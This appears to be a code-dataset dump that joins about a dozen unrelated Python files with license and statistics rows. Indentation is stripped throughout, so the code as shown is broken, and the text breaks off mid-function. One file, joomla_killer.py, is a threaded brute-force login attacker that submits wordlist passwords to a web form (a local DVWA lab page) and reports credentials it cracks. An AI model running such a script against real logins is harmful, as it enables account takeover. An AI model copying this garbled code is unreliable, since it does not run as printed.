def endElement(self, name):
if name == 'Description_Summary' and self.weakness_tag:
self.description_summary_tag = False
self.description_summary = self.description_summary + self.description_summary
self.cwe[-1]['description_summary'] = self.description_summary.replace("\n", "")
elif name == 'Weakness':
self.weakness_tag = False
# make parser
parser = make_parser()
ch = CWEHandler()
parser.setContentHandler(ch)
# check modification date
try:
(f, r) = Configuration.getFeedData('cwe')
except Exception as e:
print(e)
sys.exit("Cannot open url %s. Bad URL or not connected to the internet?"%(Configuration.getFeedURL("cwe")))
lastmodified = parse_datetime(r.headers['last-modified'], ignoretz=True)
i = db.getLastModified('cwe')
if i is not None:
if lastmodified == i:
print("Not modified")
sys.exit(0)
# parse xml and store in database
parser.parse(f)
cweList=[]
for cwe in progressbar(ch.cwe):
cwe['description_summary']=cwe['description_summary'].replace("\t\t\t\t\t", " ")
if args.v:
print (cwe)
cweList.append(cwe)
db.bulkUpdate('cwe', cweList)
#update database info after successful program-run
db.setColUpdate('cwe', lastmodified)
|
gpl-3.0
| 4,526,201,600,850,099,700
| 34.711538
| 123
| 0.686322
| false
| 3.571154
| false
| false
| false
|
mennis/oTTo
|
src/otto/lib/ethdrv.py
|
1
|
8288
|
from otto.lib.compute import average, standard_dev
from otto.lib.otypes import ReturnCode
from otto.lib.solaris import release_parse
from otto.utils import timefmt
def cmp_aoestat_devices(a, d):
# if a.device != d.device or a.size != d.size:
if a.size != d.size:
return ReturnCode(False, 'aoestat %s does not match device %s' % (a, d))
return ReturnCode(True)
def cmp_aoestat_targets(a, t):
# Confirm aoestats.paths in targets.ea
for l in a.port:
for m in a.paths[l].address:
found = False
for n in t:
mask = bin(n.ports)[2:][::-1]
if a.paths[l].port < len(mask) and mask[a.paths[l].port] == '1' and m == n.ea:
found = True
if not found:
return ReturnCode(False, 'aoestat %s does not match targets %s' % (a, t))
# Confirm targets.ea in aoestats.paths
for l in t:
mask = bin(l.ports)[2:][::-1]
for m in range(len(mask)):
if mask[m] == '1':
if l.ea not in a.paths[m].address:
return ReturnCode(False, 'targets %s does not match aoestat %s' % (t, a))
return ReturnCode(True)
def cmp_acbs_ca(a, c):
if a.index != c.index or a.wnd != c.wnd:
return ReturnCode(False, 'acbs %s does not match ca %s' % (a, c))
return ReturnCode(True)
def cmp_hba_ports(h, p):
checks = (h['port'] != str(p.index),
h['mac'] != p.ea,
h['type'] != p.name,
h['link']['max'] != str(p.maxlink),
h['link']['speed'] != str(p.currentlink))
if True in checks:
return ReturnCode(False, 'hba %s does not match ports %s' % (h, p))
return ReturnCode(True)
def cmp_hba_ifstats(h, i):
if h['port'] != str(i.port) or h['type'] != i.model or h['link']['speed'] != str(i.link):
return ReturnCode(False, 'hba %s does not match ifstats %s' % (h, i))
return ReturnCode(True)
def cmp_ports_ifstats(p, i):
if p.index != i.port or p.name != i.model or p.currentlink != i.link:
return ReturnCode(False, 'ports %s does not match ifstats %s' % (p, i))
return ReturnCode(True)
def verify_local(initiator):
aoestat = initiator.aoestat
acbs = initiator.ethdrv.acbs
ca = initiator.ethdrv.ca
cfg = initiator.ethdrv.config
devices = initiator.ethdrv.devices
targets = initiator.ethdrv.targets
for i in aoestat:
if i not in acbs:
return ReturnCode(False, 'aoestat %s not in acbs:\%s' % (i, initiator.ethdrv.acbs))
if i not in ca:
return ReturnCode(False, 'aoestat %s not in ca' % i)
if i not in cfg:
return ReturnCode(False, 'aoestat %s not in config' % i)
if i in devices:
n = cmp_aoestat_devices(aoestat[i], devices[i])
if not n:
return n
else:
return ReturnCode(False, 'aoestat %s not in devices' % i)
if i in targets:
n = cmp_aoestat_targets(aoestat[i], targets[i])
if not n:
return n
else:
return ReturnCode(False, 'aoestat %s not in targets' % i)
for i in acbs:
if i not in aoestat:
return ReturnCode(False, 'acbs %s not in aoestat' % i)
if i in ca:
n = cmp_acbs_ca(acbs[i], ca[i])
if not n:
return n
else:
return ReturnCode(False, 'acbs %s not in aoestat' % i)
if i not in cfg:
return ReturnCode(False, 'acbs %s not in config' % i)
if i not in devices:
return ReturnCode(False, 'acbs %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'acbs %s not in targets' % i)
for i in ca:
if i not in aoestat:
return ReturnCode(False, 'ca %s not in aoestat' % i)
if i in acbs:
n = cmp_acbs_ca(acbs[i], ca[i])
if not n:
return n
else:
return ReturnCode(False, 'ca %s not in acbs' % i)
if i not in cfg:
return ReturnCode(False, 'ca %s not in config' % i)
if i not in devices:
return ReturnCode(False, 'ca %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'ca %s not in targets' % i)
for i in cfg:
if i not in aoestat:
return ReturnCode(False, 'config %s not in aoestat' % i)
if i not in acbs:
return ReturnCode(False, 'config %s not in acbs' % i)
if i not in ca:
return ReturnCode(False, 'config %s not in ca' % i)
if i not in devices:
return ReturnCode(False, 'config %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'config %s not in targets' % i)
for i in devices:
if i in aoestat:
n = cmp_aoestat_devices(aoestat[i], devices[i])
if not n:
return n
else:
return ReturnCode(False, 'devices %s not in aoestat' % i)
if i not in acbs:
return ReturnCode(False, 'devices %s not in acbs' % i)
if i not in ca:
return ReturnCode(False, 'devices %s not in ca' % i)
if i not in cfg:
return ReturnCode(False, 'devices %s not in config' % i)
if i not in targets:
return ReturnCode(False, 'devices %s not in targets' % i)
for i in targets:
# check for stale target
seen = False
for j in targets[i]:
if j.ports != 0:
seen = True
if not seen:
continue
if i in aoestat:
n = cmp_aoestat_targets(aoestat[i], targets[i])
if not n:
return n
else:
return ReturnCode(False, 'targets %s not in aoestat' % i)
if i not in acbs:
return ReturnCode(False, 'targets %s not in acbs' % i)
if i not in ca:
return ReturnCode(False, 'targets %s not in ca' % i)
if i not in devices:
return ReturnCode(False, 'targets %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'targets %s not in targets' % i)
hba = initiator.hba_ports
ports = initiator.ethdrv.ports
ifstats = initiator.ethdrv.ifstats
for i in hba:
if int(i) in ports:
n = cmp_hba_ports(hba[i], ports[int(i)])
if not n:
return n
else:
return ReturnCode(False, 'hba %s not in ports' % i)
if int(i) in ifstats:
n = cmp_hba_ifstats(hba[i], ifstats[int(i)])
if not n:
return n
else:
return ReturnCode(False, 'hba %s not in ifstats' % i)
for i in ports:
if str(i) in hba:
n = cmp_hba_ports(hba[str(i)], ports[i])
if not n:
return n
else:
return ReturnCode(False, 'ports %s not in hba' % i)
if i in ifstats:
n = cmp_ports_ifstats(ports[i], ifstats[i])
if not n:
return n
else:
return ReturnCode(False, 'ports %s not in ifstats' % i)
for i in ifstats:
if str(i) in hba:
n = cmp_hba_ifstats(hba[str(i)], ifstats[i])
if not n:
return n
else:
return ReturnCode(False, 'ifstats %s not in hba' % i)
if i in ports:
n = cmp_ports_ifstats(ports[i], ifstats[i])
if not n:
return n
else:
return ReturnCode(False, 'ifstats %s not in ports' % i)
v = initiator.aoeversion
r = release_parse(initiator.ethdrv.release)
if r != v:
return ReturnCode(False, 'release %s does not match version %s' % (r, v))
# just read; nothing to compare with
_ = initiator.ethdrv.corestats
_ = initiator.ethdrv.ctl
_ = initiator.ethdrv.units
_ = initiator.ethdrv.elstats
return ReturnCode(True)
def list_stats(l):
stats = '\tsamples:%s' % len(l)
stats += '\taverage:%s' % timefmt(average(l))
stats += '\tstddev:%s' % timefmt(standard_dev(l))
stats += '\tmax:%s' % max(l)
stats += '\tmin:%s' % min(l)
return stats
|
bsd-3-clause
| -7,500,629,519,187,409,000
| 33.106996
| 95
| 0.534146
| false
| 3.359546
| true
| false
| false
|
PhillsProgrammingExperiments/runtime_context
|
contexting_lib/decorators.py
|
1
|
1661
|
from contexting_lib.runtime_context import ContextDependentFunction, RuntimeContext
def default(foo):
runtime_context = RuntimeContext()
def_p_ctx = runtime_context.default_process_context
def_t_ctx = runtime_context.default_thread_context
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[def_p_ctx] \
[def_t_ctx] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
def thread_bound(thread_context):
def decorator(foo):
runtime_context = RuntimeContext()
def_p_ctx = runtime_context.default_process_context
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[def_p_ctx] \
[thread_context] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
return decorator
def process_bound(process_context):
def decorator(foo):
runtime_context = RuntimeContext()
def_t_ctx = runtime_context.default_thread_context
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[process_context] \
[def_t_ctx] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
return decorator
def context_bound(process_context, thread_context):
def decorator(foo):
runtime_context = RuntimeContext()
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[process_context] \
[thread_context] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
return decorator
|
mit
| -6,346,212,727,357,678,000
| 35.130435
| 83
| 0.614088
| false
| 4.1525
| false
| false
| false
|
AdriaanRol/AutoDepGraph
|
autodepgraph/tests/test_graph.py
|
1
|
7160
|
from unittest import TestCase, expectedFailure
from autodepgraph import visualization as vis
import autodepgraph as adg
import networkx as nx
from autodepgraph.graph import AutoDepGraph_DAG
import yaml
import os
test_dir = os.path.join(adg.__path__[0], 'tests', 'test_data')
class Test_Graph(TestCase):
@classmethod
def setUpClass(self):
cal_True_delayed = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_True_delayed')
test_graph = AutoDepGraph_DAG('test graph')
for node in ['A', 'B', 'C', 'D', 'E']:
test_graph.add_node(node, calibrate_function=cal_True_delayed)
test_graph.add_edge('C', 'A')
test_graph.add_edge('C', 'B')
test_graph.add_edge('B', 'A')
test_graph.add_edge('D', 'A')
test_graph.add_edge('E', 'D')
self.test_graph = test_graph
def test_default_not_implemented_cal(self):
test_graph = AutoDepGraph_DAG('test graph')
test_graph.add_node('A')
self.assertEqual(test_graph.nodes()['A']['state'], 'unknown')
with self.assertRaises(ValueError):
test_graph.maintain_node('A')
self.assertEqual(test_graph.nodes()['A']['state'], 'bad')
with self.assertRaises(ValueError):
test_graph.maintain_A()
def test_tolerance_check(self):
# The default check returns 1.0
self.test_graph.nodes['A']['tolerance'] = 0
self.assertEqual(self.test_graph.check_node('A'), 'needs calibration')
self.test_graph.nodes['A']['tolerance'] = 2
self.assertEqual(self.test_graph.check_node('A'), 'good')
self.test_graph.nodes['A']['tolerance'] = 0
self.assertEqual(self.test_graph.check_node('A'), 'needs calibration')
def test_maintain_node_assume_unkown_is_good(self):
self.test_graph.set_all_node_states(
'unknown')
self.test_graph.maintain_node('C')
self.assertEqual(self.test_graph.nodes()['C']['state'], 'good')
self.assertEqual(self.test_graph.nodes()['B']['state'], 'unknown')
def test_calibration_state(self):
s = self.test_graph.calibration_state()
assert( isinstance(s, dict))
def test_set_function(self):
self.test_graph.set_node_attribute('A', 'myattribute', 10)
self.assertEqual(self.test_graph.get_node_attribute('A', 'myattribute'), 10)
self.test_graph.set_node_description('A', 'explain node A')
self.assertEqual(self.test_graph.get_node_attribute('A', 'description'), 'explain node A')
def test_maintain_node_require_cal(self):
self.test_graph.set_all_node_states(
'needs calibration')
self.test_graph.maintain_node('C')
self.assertEqual(self.test_graph.nodes()['C']['state'], 'good')
self.assertEqual(self.test_graph.nodes()['B']['state'], 'good')
self.assertEqual(self.test_graph.nodes()['D']['state'],
'needs calibration')
def test_bad_node(self):
cal_True_delayed = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_True_delayed')
test_graph = AutoDepGraph_DAG('test graph')
for node in ['A', 'B', 'C', 'D', 'E']:
test_graph.add_node(node, calibrate_function=cal_True_delayed)
test_graph.add_edge('C', 'A')
test_graph.add_edge('C', 'B')
test_graph.add_edge('B', 'A')
test_graph.add_edge('D', 'A')
test_graph.add_edge('E', 'D')
test_graph.set_all_node_states('unknown')
self.assertEqual(test_graph.nodes()['C']['state'], 'unknown')
self.assertEqual(test_graph.nodes()['B']['state'], 'unknown')
self.assertEqual(test_graph.nodes()['A']['state'], 'unknown')
cal_False = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_False')
test_graph.nodes['C']['calibrate_function'] = cal_False
# Failure to calibrate should raise an error
with self.assertRaises(ValueError):
test_graph.maintain_node('C')
# In the process of trying to fix node C it should try to
# calibrate it's requirements
self.assertEqual(test_graph.nodes()['C']['state'], 'bad')
self.assertEqual(test_graph.nodes()['B']['state'], 'good')
self.assertEqual(test_graph.nodes()['A']['state'], 'good')
cal_True_delayed = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_True_delayed')
def test_plotting_mpl(self):
self.test_graph.draw_mpl()
self.test_graph.cfg_plot_mode = 'matplotlib'
self.test_graph.update_monitor()
# call twice to have both creation and update of plot
self.test_graph.update_monitor()
def test_plotting_svg(self):
self.test_graph.draw_svg()
self.test_graph.cfg_plot_mode = 'svg'
self.test_graph.update_monitor()
# call twice to have both creation and update of plot
self.test_graph.update_monitor()
def test_dummy_cal_three_qubit_graph(self):
fn = os.path.join(test_dir, 'three_qubit_graph.yaml')
DAG = nx.readwrite.read_yaml(fn)
DAG.set_all_node_states('needs calibration')
DAG.cfg_plot_mode = None
DAG.maintain_node('Chevron q0-q1')
self.assertEqual(DAG.get_node_state('Chevron q0-q1'), 'good')
self.assertEqual(DAG.get_node_state('CZ q0-q1'), 'needs calibration')
def test_write_read_yaml(self):
"""
Mostly an example on how to read and write, but also test for
weird objects being present.
"""
self.test_graph.nodes()['C']['state'] = 'good'
self.test_graph.nodes()['B']['state'] = 'unknown'
fn = os.path.join(test_dir, 'nx_test_graph.yaml')
nx.readwrite.write_yaml(self.test_graph, fn)
read_testgraph = nx.readwrite.read_yaml(fn)
self.assertTrue(isinstance(read_testgraph, AutoDepGraph_DAG))
self.assertEqual(read_testgraph.nodes()['C']['state'], 'good')
self.assertEqual(read_testgraph.nodes()['B']['state'], 'unknown')
def test_adding_edge_nonexistent_node(self):
test_graph = AutoDepGraph_DAG('test graph')
test_graph.add_node('A')
with self.assertRaises(KeyError):
test_graph.add_edge('A', 'B')
with self.assertRaises(KeyError):
test_graph.add_edge('B', 'A')
# def propagate_error(self, state):
# '''
# Sets the state of this node to 'state' and calls this method for all
# child nodes (nodes that depend on this node). Used for recursively
# propagate errors.
# '''
# self.state(state)
# for child_name in self.children():
# # This will result in a depth-first search through the graph
# # that is quite inefficient and can visit many nodes multiple
# # times. We don't really care though, since the graph shouldn't
# # larger than ~100 nodes.
# self.find_instrument(child_name).propagate_error(state)
|
mit
| 1,161,567,346,362,417,000
| 40.627907
| 98
| 0.609358
| false
| 3.654926
| true
| false
| false
|
crateio/crate.web
|
crate/web/dashboard/modules.py
|
2
|
1435
|
import collections
import datetime
import redis
from django.conf import settings
from django.utils.timezone import utc
from admin_tools.dashboard.modules import DashboardModule
class StatusModule(DashboardModule):
title = "Status"
template = "admin_tools/dashboard/modules/status.html"
def init_with_context(self, context):
if hasattr(settings, "PYPI_DATASTORE"):
datastore = redis.StrictRedis(**dict([(x.lower(), y) for x, y in settings.REDIS[settings.PYPI_DATASTORE].items()]))
if datastore.get("crate:pypi:since") is not None:
self.last_sync = datetime.datetime.fromtimestamp(float(datastore.get("crate:pypi:since")))
self.last_sync.replace(tzinfo=utc)
else:
self.last_sync = None
self.celery_queue_length = datastore.llen("celery")
def is_empty(self):
return False
class RedisStatusModule(DashboardModule):
title = "Redis Status"
template = "admin_tools/dashboard/modules/redis.html"
def init_with_context(self, context):
if hasattr(settings, "PYPI_DATASTORE"):
datastore = redis.StrictRedis(**dict([(x.lower(), y) for x, y in settings.REDIS[settings.PYPI_DATASTORE].items()]))
self.redis_info = collections.OrderedDict(sorted([(k, v) for k, v in datastore.info().iteritems()], key=lambda x: x[0]))
def is_empty(self):
return False
|
bsd-2-clause
| 6,472,937,229,180,296,000
| 31.613636
| 132
| 0.661324
| false
| 3.857527
| false
| false
| false
|
zillians/supercell
|
scripts/set_xml.py
|
1
|
1678
|
#!/usr/bin/env python
from xml.dom.minidom import parse, parseString
import getopt
import sys
class DomHandler():
def __init__(self, file_name):
self.dom = parse(file_name)
def setValue(self, attr_name, attr_value):
result = False
for node in self.dom.getElementsByTagName('parameter'):
if node.getAttribute('name') == attr_name:
""" parameter name is equal to attr_name """
print "find attribute name: %s" % (attr_name)
result = True
if node.getAttribute('value') == attr_value:
continue
else:
node.setAttribute('value', attr_value)
print "set attribute value: %s" % (attr_value)
return result
def save(self, file_name):
f = open(file_name, 'w')
f.write(self.dom.toxml())
f.close
def main():
if len(sys.argv) < 4:
usage()
sys.exit(2)
fileName = sys.argv[1]
attrName = sys.argv[2]
attrValue = sys.argv[3]
simpleDom = DomHandler(fileName)
result = simpleDom.setValue(attrName, attrValue)
if not result:
print "set attribute fail"
else:
simpleDom.save(fileName)
def usage():
print "usage: %s [file] [name] [value]" % (__file__)
print\
"""
[file] xml file
[name] attribute name
[value] value to set to that attribute
"""
def test():
dom1 = parse( "/nfs/home/zac/zillians/lib/node/world-server/WorldServerModule.module" ) # parse an XML file
dom2 = parseString( "<myxml>Some data <empty/> some more data</myxml>" )
print dom1.toxml()
#print dom2.toxml()
for node in dom1.getElementsByTagName('parameter'): # visit every node <bar />
if node.getAttribute("name") == "local_id":
print "node attribute value: %s" % (node.getAttribute("value"))
if __name__ == "__main__":
main()
|
agpl-3.0
| 1,887,179,124,444,890,400
| 24.815385
| 110
| 0.662694
| false
| 2.913194
| false
| false
| false
|
ablil98/python
|
bhp/joomla_killer.py
|
1
|
3126
|
#!/usr/bin/env python3
import threading
import queue
import http.cookiejar
import urllib.request
import urllib.parse
import time
import pdb
from html.parser import HTMLParser
# general variables
threads = 1
username = 'admin'
wordlist_file = 'passwords.lst'
resume = None # password to resume from
# target variables
target_url = 'http://localhost/dvwa/login.php'
target_post = 'http://localhost/dvwa/login.php'
# form variables
username_field = 'username'
password_field = 'password'
class BruteParser(HTMLParser):
"""get form field"""
def __init__(self):
super(BruteParser, self).__init__()
self.tag_results = dict()
def handle_starttag(self, tag, attrs):
if tag == 'input':
tag_name = None
tag_value = None
for name, value in attrs :
if name == 'name':
tag_name = value
if name == 'value':
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
class Bruter():
def __init__(self, username, words):
self.username = username
self.passwords_q = words
self.found = False # Set to True if we found the password
print("[+] Finished setting up for {} ".format(self.username))
def run_bruteforce(self):
for i in range(threads):
print("[*] Spawning thread {} ...".format(i))
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.passwords_q.empty() and not self.found:
password_try = self.passwords_q.get()
# create cookie jar
cookie_jar = http.cookiejar.FileCookieJar("cookies")
# handle cookie jar for urllib library
cookie_handler = urllib.request.HTTPCookieProcessor(cookie_jar)
# get url respone
opener = urllib.request.build_opener(cookie_handler)
response = opener.open(target_url)
page = response.read()
print("[*] Trying : {} - {} ( {} left )".format(self.username, password_try, self.passwords_q.qsize()))
# parse html data
parser = BruteParser()
parser.feed(page.decode())
# set our username and password
post_tags = parser.tag_results
post_tags[username_field] = self.username
post_tags[password_field] = password_try
login_data = urllib.parse.urlencode(post_tags)
login_response = opener.open(target_post, login_data.encode())
login_result = login_response.read()
# if found the password
if 'Login failed' not in login_result.decode():
self.found = True
print("Brute Foce successffull Yeah")
print("\n[+] Username : {}".format(self.username))
print("[+] Password : {}\n".format(password_try))
print("[*] Waiting for other processes to stop ...")
def build_wordlist(wordlist_file):
wordlist_queue = queue.Queue()
with open(wordlist_file, 'r') as f:
raw_data = f.readlines()
for word in raw_data:
wordlist_queue.put(word.rstrip())
return wordlist_queue
if __name__ == '__main__':
print('[*] Reading wordlist : {} '.format(wordlist_file))
passwords_q = build_wordlist(wordlist_file)
print('[+] Finished reading wordlist successfully ({} passwords)'.format(passwords_q.qsize()))
bruteforcer = Bruter('admin', passwords_q)
bruteforcer.run_bruteforce()
|
gpl-3.0
| 1,010,688,772,363,187,200
| 24.008
| 106
| 0.680102
| false
| 3.206154
| false
| false
| false
|
slek120/phys534
|
HW4/Aw.py
|
1
|
1191
|
from scipy import *
from scipy.integrate import simps
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def Compute_Aw(om, DOS, Sig, ommesh, delta=0.1j):
Aw = zeros(len(om))
for i in range(len(om)):
DMFTW = DOS / (om[i] - Sig[i] - ommesh + delta)
Aw[i] = simps(-1.*DMFTW.imag/pi, ommesh)
return Aw
# Load DOS
DOSfile = loadtxt('2D_SL_DOS')
# 1st column as energies
ommesh = DOSfile[:,0]
# 2nd column as DOS
DOS = DOSfile[:,1]
# Normalize
DOS = DOS / simps(DOS, ommesh)
# Load Sig
Sigfile = loadtxt('Sig.out.U6')
# 1st column as frequencies
om = Sigfile[:,0]
# 2nd, 3rd column as self energy
Sig = Sigfile[:,1] + 1j * Sigfile[:,2]
Aw = Compute_Aw(om, DOS, Sig, ommesh)
plt.plot(om, Aw)
plt.xlim(0,50)
plt.legend(['U=6'], loc='best')
plt.ylabel('$A(\omega)$')
plt.xlabel('$\omega$')
plt.savefig('Aw_U6.png')
# Load Sig
Sigfile = loadtxt('Sig.out.U12')
# 1st column as frequencies
om = Sigfile[:,0]
# 2nd, 3rd column as self energy
Sig = Sigfile[:,1] + 1j * Sigfile[:,2]
Aw = Compute_Aw(om, DOS, Sig, ommesh)
plt.plot(om, Aw)
plt.xlim(0,50)
plt.legend(['U=12'], loc='best')
plt.ylabel('$A(\omega)$')
plt.xlabel('$\omega$')
plt.savefig('Aw_U12.png')
|
gpl-3.0
| -4,123,881,550,766,441,000
| 21.903846
| 51
| 0.650714
| false
| 2.465839
| false
| false
| false
|
google/ffn
|
ffn/training/import_util.py
|
1
|
1882
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains a utility function for dynamically importing symbols from modules.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import logging
def import_symbol(specifier, default_packages='ffn.training.models'):
"""Imports a symbol from a python module.
The calling module must have the target module for the import as dependency.
Args:
specifier: full path specifier in format
[<packages>.]<module_name>.<model_class>, if packages is missing
``default_packages`` is used.
default_packages: chain of packages before module in format
<top_pack>.<sub_pack>.<subsub_pack> etc.
Returns:
symbol: object from module
"""
module_path, symbol_name = specifier.rsplit('.', 1)
try:
logging.info('Importing symbol %s from %s.%s',
symbol_name, default_packages, module_path)
module = importlib.import_module(default_packages + '.' + module_path)
except ImportError as e:
logging.info(e)
logging.info('Importing symbol %s from %s', symbol_name, module_path)
module = importlib.import_module(module_path)
symbol = getattr(module, symbol_name)
return symbol
|
apache-2.0
| 2,617,406,135,293,789,000
| 35.192308
| 80
| 0.689692
| false
| 4.248307
| false
| false
| false
|
guixing/simplecmdb
|
hostinfo/models.py
|
1
|
1100
|
from django.db import models
class Host(models.Model):
"""store host information"""
hostname = models.CharField(max_length=30)
osver = models.CharField(max_length=30)
vendor = models.CharField(max_length=30)
product = models.CharField(max_length=30)
cpu_model = models.CharField(max_length=30)
cpu_num = models.IntegerField(max_length=2)
memory = models.IntegerField(max_length=8)
sn = models.CharField(max_length=30)
ipaddr = models.IPAddressField(max_length=15)
identity = models.CharField(max_length=32)
def __unicode__(self):
return self.hostname
class HostGroup(models.Model):
name = models.CharField(max_length=30)
members = models.ManyToManyField(Host)
def __unicode__(self):
return self.name
def handle_hostsave_signal(sender, **kwargs):
new_host = kwargs['instance']
old_host = Host.objects.get(identity=new_host.identity)
if new_host.hostname != old_host.hostname:
change_hostname(new_host.ipaddr, new_host.hostname)
#models.signals.pre_save.connect(handle_hostsave_signal, sender=Host)
|
bsd-3-clause
| 6,485,501,293,390,478,000
| 32.333333
| 69
| 0.702727
| false
| 3.536977
| false
| false
| false
|
andyzsf/django
|
django/contrib/gis/gdal/driver.py
|
1
|
3257
|
from ctypes import c_void_p
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.error import OGRException
from django.contrib.gis.gdal.prototypes import ds as vcapi, raster as rcapi
from django.utils import six
from django.utils.encoding import force_bytes, force_text
class Driver(GDALBase):
"""
Wraps a GDAL/OGR Data Source Driver.
For more information, see the C API source code:
http://www.gdal.org/gdal_8h.html - http://www.gdal.org/ogr__api_8h.html
"""
# Case-insensitive aliases for some GDAL/OGR Drivers.
# For a complete list of original driver names see
# http://www.gdal.org/ogr_formats.html (vector)
# http://www.gdal.org/formats_list.html (raster)
_alias = {
# vector
'esri': 'ESRI Shapefile',
'shp': 'ESRI Shapefile',
'shape': 'ESRI Shapefile',
'tiger': 'TIGER',
'tiger/line': 'TIGER',
# raster
'tiff': 'GTiff',
'tif': 'GTiff',
'jpeg': 'JPEG',
'jpg': 'JPEG',
}
def __init__(self, dr_input):
"""
Initializes an GDAL/OGR driver on either a string or integer input.
"""
if isinstance(dr_input, six.string_types):
# If a string name of the driver was passed in
self.ensure_registered()
# Checking the alias dictionary (case-insensitive) to see if an
# alias exists for the given driver.
if dr_input.lower() in self._alias:
name = self._alias[dr_input.lower()]
else:
name = dr_input
# Attempting to get the GDAL/OGR driver by the string name.
for iface in (vcapi, rcapi):
driver = iface.get_driver_by_name(force_bytes(name))
if driver:
break
elif isinstance(dr_input, int):
self.ensure_registered()
for iface in (vcapi, rcapi):
driver = iface.get_driver(dr_input)
if driver:
break
elif isinstance(dr_input, c_void_p):
driver = dr_input
else:
raise OGRException('Unrecognized input type for GDAL/OGR Driver: %s' % str(type(dr_input)))
# Making sure we get a valid pointer to the OGR Driver
if not driver:
raise OGRException('Could not initialize GDAL/OGR Driver on input: %s' % str(dr_input))
self.ptr = driver
def __str__(self):
return self.name
@classmethod
def ensure_registered(cls):
"""
Attempts to register all the data source drivers.
"""
# Only register all if the driver count is 0 (or else all drivers
# will be registered over and over again)
if not cls.driver_count():
vcapi.register_all()
rcapi.register_all()
@classmethod
def driver_count(cls):
"""
Returns the number of GDAL/OGR data source drivers registered.
"""
return vcapi.get_driver_count() + rcapi.get_driver_count()
@property
def name(self):
"""
Returns description/name string for this driver.
"""
return force_text(rcapi.get_driver_description(self.ptr))
|
bsd-3-clause
| 3,520,037,014,693,149,700
| 32.57732
| 103
| 0.580596
| false
| 4.025958
| false
| false
| false
|
airbnb/streamalert
|
publishers/community/generic.py
|
1
|
9345
|
"""
Copyright 2017-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import deque, OrderedDict
import re
from streamalert.shared.publisher import Register, AlertPublisher
from streamalert.shared.normalize import Normalizer
from streamalert.shared.utils import get_keys
@Register
def add_record(alert, publication):
"""Publisher that adds the alert.record to the publication."""
publication['record'] = alert.record
return publication
@Register
def blank(*_):
"""Erases all fields on existing publications and returns a blank dict"""
return {}
@Register
def remove_internal_fields(_, publication):
"""This publisher removes fields from DefaultPublisher that are only useful internally"""
publication.pop('staged', None)
publication.pop('publishers', None)
publication.pop('outputs', None)
return publication
def _delete_dictionary_fields(publication, regexp):
"""Deeply destroys all nested dict keys matching the given regexp string
Args:
publication (dict): A publication
regexp (str): A String that is valid regexp
Returns:
dict
(!) warning, will modify the original publication
"""
# Python is bad at recursion so I managed to tip toe around that with BFS using a queue.
# This heavily takes advantage of internal references being maintained properly as the loop
# does not actually track the "current scope" of the next_item.
fringe = deque()
fringe.append(publication)
while len(fringe) > 0:
next_item = fringe.popleft()
if isinstance(next_item, dict):
# work on a copy of the keys to avoid modifying the dict while iterating over it
for key in list(next_item.keys()):
if re.search(regexp, key):
next_item.pop(key, None)
for key, item in next_item.items():
fringe.append(item)
elif isinstance(next_item, list):
fringe.extend(next_item)
else:
# It's a leaf node, or it's some strange object that doesn't belong here
pass
return publication
@Register
def remove_fields(alert, publication):
"""This publisher deletes fields from the current publication.
The publisher uses the alert's context to determine which fields to delete. Example:
context={
'remove_fields': ['^field1$', '^field2$', ...]
}
"remove_fields" should be an array of strings that are valid regular expressions.
The algorithm deeply searches the publication for any dict key that matches the given regular
expression. Any such key is removed, and if the value is a nested dict, the entire dict
branch underneath is removed.
"""
fields = alert.context.get('remove_fields', [])
for field in fields:
publication = _delete_dictionary_fields(publication, field)
return publication
@Register
def remove_streamalert_normalization(_, publication):
"""This publisher removes the super heavyweight 'streamalert_normalization' fields"""
return _delete_dictionary_fields(publication, Normalizer.NORMALIZATION_KEY)
@Register
def enumerate_fields(_, publication):
"""Flattens all currently published fields.
By default, publications are deeply nested dict structures. This can be very hard to read
when rendered in certain outputs. PagerDuty is one example where the default UI does a very
poor job rendering nested dicts.
This publisher collapses deeply nested fields into a single-leveled dict with keys that
correspond to the original path of each value in a deeply nested dict. For example:
{
"top1": {
"mid1": "low",
"mid2": [ "low1", "low2", "low3" ],
"mid3": {
"low1": "verylow"
}
},
"top2": "mid"
}
.. would collapse into the following structure:
{
"top1.mid1": "low",
"top1.mid2[0]": "low1",
"top1.mid2[1]": "low1",
"top1.mid2[2]": "low1",
"top1.mid3.low1: "verylow",
"top2": "mid"
}
The output dict is an OrderedDict with keys sorted in alphabetical order.
"""
def _recursive_enumerate_fields(structure, output_reference, path=''):
if isinstance(structure, list):
for index, item in enumerate(structure):
_recursive_enumerate_fields(item, output_reference, '{}[{}]'.format(path, index))
